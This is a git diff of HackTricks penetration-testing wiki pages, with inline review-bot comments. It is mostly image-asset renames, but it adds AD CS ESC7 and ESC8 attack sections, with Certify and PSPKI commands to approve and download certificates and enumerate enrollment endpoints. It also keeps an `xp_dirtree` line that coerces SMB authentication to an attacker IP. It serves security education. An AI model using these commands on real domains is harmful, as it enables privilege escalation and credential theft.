![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -164,7 +164,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# 5432,5433 - Pentesting Postgresql
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -99,7 +99,7 @@ ORDER BY 1;
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -179,7 +179,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Command Injection
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -101,7 +101,7 @@ Here are the top 25 parameters that could be vulnerable to code injection and si
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -187,7 +187,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Email Injections
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -118,7 +118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -285,7 +285,7 @@ In this case the attacker **won't receive the response timeout until he has sen
|
|||
|
||||
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
|
||||
|
||||
|
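Review bot: the changed line only renames the figure asset (`image (1).png` to `image (1) (1).png`) and keeps `alt=""`. This figure is the one the surrounding text relies on to explain why ALB forces a race (the response to the half request arriving before the body is forwarded), so give it a caption or alt such as `alt="ALB returns the upstream timeout before forwarding the request body"`; a reader without images then still follows the argument, and the next asset renumbering can be checked against the diff instead of against the rendered site.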
|
|
@ -1,7 +1,7 @@
|
|||
# NoSQL injection
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -121,7 +121,7 @@ Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cock
|
|||
![](<../.gitbook/assets/image (468).png>)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -272,7 +272,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Race Condition
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -125,7 +125,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Rate Limit Bypass
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -84,7 +84,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# XS-Search
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -84,7 +84,7 @@ You can access the tool in [https://xsinator.com/](https://xsinator.com/)
|
|||
{% endhint %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -196,7 +196,7 @@ You can perform the same attack with **`portal`** tags.
|
|||
Applications often use [postMessage broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to share information with other origins. Listening to this messages one could find **sensitive info** (potentially if the the `targetOrigin` param is not used). Also, the fact of receiving some message can be **used as an oracle** (you only receive this kind of message if you are logged in).
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
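Review bot: the unchanged context line about postMessage broadcasts carries two typos ('Listening to this messages', 'the the `targetOrigin` param') that this hunk leaves in place; since the hunk already touches the banner directly under that paragraph, fix them here. The parenthetical would also read more precisely as 'when the sender does not restrict `targetOrigin`', which is the condition under which a cross-origin listener receives the message at all.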
@ -278,7 +278,7 @@ Browsers use sockets to communicate with servers. As the operating system and th
|
|||
For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -817,7 +817,7 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
|
|||
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -935,7 +935,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -184,13 +184,13 @@ During certificate authentication, the DC can then verify that the authenticatin
|
|||
Schannel is the security support provider (SSP) Windows leverages when establishing TLS/SSL connections. Schannel supports **client authentication** (amongst many other capabilities), enabling a remote server to **verify the identity of the connecting user**. It accomplishes this using PKI, with certificates being the primary credential.\
|
||||
During the **TLS handshake**, the server **requests a certificate from the client** for authentication. The client, having previously been issued a client authentication certificate from a CA the server trusts, sends its certificate to the server. The **server then validates** the certificate is correct and grants the user access assuming everything is okay.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (8) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
When an account authenticates to AD using a certificate, the DC needs to somehow map the certificate credential to an AD account. **Schannel** first attempts to **map** the **credential** to a **user** account use Kerberos’s **S4U2Self** functionality. \
|
||||
If that is **unsuccessful**, it will follow the attempt to map the **certificate to a user** account using the certificate’s **SAN extension**, a combination of the **subject** and **issuer** fields, or solely from the issuer. By default, not many protocols in AD environments support AD authentication via Schannel out of the box. WinRM, RDP, and IIS all support client authentication using Schannel, but it **requires additional configuration**, and in some cases – like WinRM – does not integrate with Active Directory.\
|
||||
One protocol that does commonly work – assuming AD CS has been setup - is **LDAPS**. The cmdlet `Get-LdapCurrentUser` demonstrates how one can authenticate to LDAP using .NET libraries. The cmdlet performs an LDAP “Who am I?” extended operation to display the currently authenticating user:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## AD CS Enumeration
|
||||
|
||||
|
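Review bot: the two figure lines here are bare asset renames with `alt=""`; the first screenshot illustrates the Schannel client-certificate handshake and the second the `Get-LdapCurrentUser` "Who am I?" output, so name them in the alt text rather than leaving both anonymous. While this block is being touched, the context line 'map the credential to a user account use Kerberos's S4U2Self' should read 'using', and 'assuming AD CS has been setup -' should read 'set up', both of which this hunk leaves unchanged.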
|
|
@ -188,6 +188,100 @@ If you find this setting in your environment, you can **remove this flag** with:
|
|||
certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
|
||||
```
|
||||
|
||||
## Vulnerable Certificate Authority Access Control - ESC7
|
||||
|
||||
A certificate authority itself has a **set of permissions** that secure various **CA actions**. These permissions can be access from `certsrv.msc`, right clicking a CA, selecting properties, and switching to the Security tab:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
This can also be enumerated via [**PSPKI’s module**](https://www.pkisolutions.com/tools/pspki/) with `Get-CertificationAuthority | Get-CertificationAuthorityAcl`:
|
||||
|
||||
```bash
|
||||
Get-CertificationAuthority -ComputerName dc.theshire.local | Get-certificationAuthorityAcl | select -expand Access
|
||||
```
|
||||
|
||||
The two main rights here are the **`ManageCA`** right and the **`ManageCertificates`** right, which translate to the “CA administrator” and “Certificate Manager”.
|
||||
|
||||
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (73).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
This is also possible in a simpler form with [**PSPKI’s Enable-PolicyModuleFlag**](https://www.sysadmins.lv/projects/pspki/enable-policymoduleflag.aspx) cmdlet.
|
||||
|
||||
The **`ManageCertificates`** rights permits to **approve a pending request**, therefore bypassing the "CA certificate manager approval" protection.
|
||||
|
||||
You can use a **combination** of **Certify** and **PSPKI** module to request a certificate, approve it, and download it:
|
||||
|
||||
```powershell
|
||||
# Request a certificate that will require an approval
|
||||
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:ApprovalNeeded
|
||||
[...]
|
||||
[*] CA Response : The certificate is still pending.
|
||||
[*] Request ID : 336
|
||||
[...]
|
||||
|
||||
# Use PSPKI module to approve the request
|
||||
Import-Module PSPKI
|
||||
Get-CertificationAuthority -ComputerName dc.theshire.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
|
||||
|
||||
# Download the certificate
|
||||
Certify.exe download /ca:dc.theshire.local\theshire-DC-CA /id:336
|
||||
```
|
||||
|
||||
## NTLM Relay to AD CS HTTP Endpoints – ESC8
|
||||
|
||||
{% hint style="info" %}
|
||||
In summary, if an environment has **AD CS installed**, along with a **vulnerable web enrollment endpoint** and at least one **certificate template published** that allows for **domain computer enrollment and client authentication** (like the default **`Machine`** template), then an **attacker can compromise ANY computer with the spooler service running**!
|
||||
{% endhint %}
|
||||
|
||||
AD CS supports several **HTTP-based enrollment methods** via additional AD CS server roles that administrators can install. These HTTPbased certificate enrollment interfaces are all **vulnerable NTLM relay attacks**. Using NTLM relay, an attacker on a **compromised machine can impersonate any inbound-NTLM-authenticating AD account**. While impersonating the victim account, an attacker could access these web interfaces and **request a client authentication certificate based on the `User` or `Machine` certificate templates**.
|
||||
|
||||
* The **web enrollment interface** (an older looking ASP application accessible at `http://<caserver>/certsrv/`), by default only supports HTTP, which cannot protect against NTLM relay attacks. In addition, it explicitly only allows NTLM authentication via its Authorization HTTP header, so more secure protocols like Kerberos are unusable.
|
||||
* The **Certificate Enrollment Service** (CES), **Certificate Enrollment Policy** (CEP) Web Service, and **Network Device Enrollment Service** (NDES) support negotiate authentication by default via their Authorization HTTP header. Negotiate authentication **support** Kerberos and **NTLM**; consequently, an attacker can **negotiate down to NTLM** authentication during relay attacks. These web services do at least enable HTTPS by default, but unfortunately HTTPS by itself does **not protect against NTLM relay attacks**. Only when HTTPS is coupled with channel binding can HTTPS services be protected from NTLM relay attacks. Unfortunately, AD CS does not enable Extended Protection for Authentication on IIS, which is necessary to enable channel binding.
|
||||
|
||||
Common **problems** with NTLM relay attacks are that the **NTLM sessions are usually short** and that the attacker **cannot** interact with services that **enforce NTLM signing**.
|
||||
|
||||
However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check:
|
||||
|
||||
{% content-ref url="account-persistence.md" %}
|
||||
[account-persistence.md](account-persistence.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. An attacker could wait or could try to **force** it:
|
||||
|
||||
{% content-ref url="../printers-spooler-service-abuse.md" %}
|
||||
[printers-spooler-service-abuse.md](../printers-spooler-service-abuse.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
****[**Certify**](https://github.com/GhostPack/Certify)’s `cas` command can enumerate **enabled HTTP AD CS endpoints**:
|
||||
|
||||
```
|
||||
Certify.exe cas
|
||||
```
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (78).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Enterprise CAs also **store CES endpoints** in their AD object in the `msPKI-Enrollment-Servers` property. **Certutil.exe** and **PSPKI** can parse and list these endpoints:
|
||||
|
||||
```
|
||||
certutil.exe -enrollmentServerURL -config CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA
|
||||
```
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
```powershell
|
||||
Import-Module PSPKI
|
||||
Get-CertificationAuthority | select Name,Enroll* | Format-List *
|
||||
```
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (81).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## References
|
||||
|
||||
* All the information for this page was taken from [https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
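Review bot: the ACL enumeration block at the top of ESC7 is fenced with the `bash` tag but contains PowerShell (`Get-CertificationAuthority ... | select -expand Access`); tag it `powershell` like the approval block below it, and tag the two untagged fences (`Certify.exe cas` and `certutil.exe -enrollmentServerURL ...`) as well so GitBook renders them consistently. The cross-reference `[ECS6](domain-escalation.md#editf_attributesubjectaltname2-esc6)` should read ESC6 to match the section it links to. The ESC8 text states that AD CS does not enable Extended Protection for Authentication on IIS and that the web enrollment interface defaults to HTTP and NTLM only, but never states the corresponding fix; a one-line mitigation next to the `{% hint %}` (enable EPA and require SSL on the enrollment web endpoints, or disable NTLM on them) gives defenders the actionable part. Smaller wording issues in the added lines: 'can be access from' should be 'accessed', 'HTTPbased' should be 'HTTP-based', 'vulnerable NTLM relay attacks' should be 'vulnerable to NTLM relay attacks', 'Negotiate authentication support' should be 'supports', 'abusing a NTLM relay' should be 'an NTLM relay', 'solves this limitations' should be 'these limitations', 'an stolen cert' should be 'a stolen cert', and the stray `****` before `[**Certify**]` in the `cas` paragraph should go.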
|
|
@ -0,0 +1,39 @@
|
|||
# Domain Persistence
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
|
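Review bot: the new `domain-persistence.md` has a title and no body, and the "Support HackTricks" `<details>` block appears twice (once directly after the heading, once at the end, separated only by blank lines). Either land the page with at least a stub sentence describing the persistence techniques it is meant to cover, or hold it back until the content exists; in either case drop one of the two identical `<details>` blocks, since the other pages in this diff carry that block once, at the bottom.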
@ -1,7 +1,7 @@
|
|||
# DCSync
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -45,7 +45,7 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -106,7 +106,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -87,13 +87,13 @@ In the previous flow it was used the trust hash instead of the **clear text pass
|
|||
|
||||
The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
|
||||
|
||||
![](<../../.gitbook/assets/image (2) (1).png>)
|
||||
![](<../../.gitbook/assets/image (2) (1) (2).png>)
|
||||
|
||||
Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
|
||||
|
||||
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
|
||||
|
||||
![](<../../.gitbook/assets/image (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (1) (1) (2).png>)
|
||||
|
||||
## References
|
||||
|
||||
|
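Review bot: both screenshots in this hunk get a cascade rename (`image (2) (1).png` to `image (2) (1) (2).png`, `image (1) (1).png` to `image (1) (1) (2).png`) with no alt text, so nothing in the diff ties the first to the mimikatz `[ CLEAR ]` output and the second to the Domain Admins query against root.local. Add alt text naming each and confirm in the asset folder that the two new names were not crossed during renumbering. In the context line, the `\[ CLEAR ]` escape renders as a literal bracket, which works, but a code span around `[ CLEAR ]` would be clearer than the backslash.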
|
|
@ -1,7 +1,7 @@
|
|||
# Kerberoast
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -77,7 +77,7 @@ When a TGS is requested, Windows event `4769 - A Kerberos service ticket was req
|
|||
{% endhint %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -144,7 +144,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -87,6 +87,8 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S
|
|||
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
|
||||
```
|
||||
|
||||
Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
|
||||
|
||||
## HTML injection
|
||||
|
||||
### Via email
|
||||
|
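Review bot: the added line 'Or use this other technique: <link>' gives only a URL; say in the sentence what the linked project does relative to the `xp_dirtree` call shown above it, so a reader knows whether it is a different coercion primitive or tooling around the same one, and prefer 'Alternatively, see ...' over 'Or use this other technique'. From the defensive side, the paragraph would benefit from noting that `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` makes the SQL Server service account open an outbound SMB connection to an arbitrary UNC path, which is the behaviour to alert on.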
|
|
@ -1,7 +1,7 @@
|
|||
# ACLs - DACLs/SACLs/ACEs
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -83,7 +83,7 @@ The canonical order ensures that the following takes place:
|
|||
* All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified.
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -209,7 +209,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|